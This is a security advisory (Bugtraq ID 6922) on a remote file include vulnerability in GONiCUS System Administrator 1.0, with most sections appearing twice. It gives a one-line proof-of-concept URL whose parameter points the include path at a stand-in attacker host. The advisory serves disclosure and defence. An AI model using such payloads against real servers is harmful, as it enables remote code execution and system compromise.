GONiCUS System Administrator Remote File Include Vulnerability
BID:6922
Info
GONiCUS System Administrator Remote File Include Vulnerability
| Bugtraq ID: | 6922 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 24 2003 12:00AM |
| Updated: | Feb 24 2003 12:00AM |
| Credit: | Discovery of this vulnerability has been credited to: Karol Wiêsek <[email protected]>. |
| Vulnerable: |
GONiCUS System Administrator 1.0 |
| Not Vulnerable: | |
Discussion
GONiCUS System Administrator Remote File Include Vulnerability
GONiCUS System Administrator is prone to an issue that may allow remote attackers to include files located on remote servers. This issue is present in several PHP pages existing in the /plugins and /includes folders.
By crafting specific URI parameters it is possible for an attacker to influence the include path for these scripts to an external file on an attacker-controlled host. If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the vulnerable web server.
This vulnerability has been reported for GONiCUS System Administrator Version 1, previous versions may also be affected.
GONiCUS System Administrator is prone to an issue that may allow remote attackers to include files located on remote servers. This issue is present in several PHP pages existing in the /plugins and /includes folders.
By crafting specific URI parameters it is possible for an attacker to influence the include path for these scripts to an external file on an attacker-controlled host. If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the vulnerable web server.
This vulnerability has been reported for GONiCUS System Administrator Version 1, previous versions may also be affected.
Exploit / POC
GONiCUS System Administrator Remote File Include Vulnerability
The following proof of concept was provided:
http://www.example.org/include/help.php?base=http://www.attacker.org/
The following proof of concept was provided:
http://www.example.org/include/help.php?base=http://www.attacker.org/
Solution / Fix
GONiCUS System Administrator Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
GONiCUS System Administrator Remote File Include Vulnerability
References:
References:
- GONiCUS System Administrator Homepage (GONiCUS)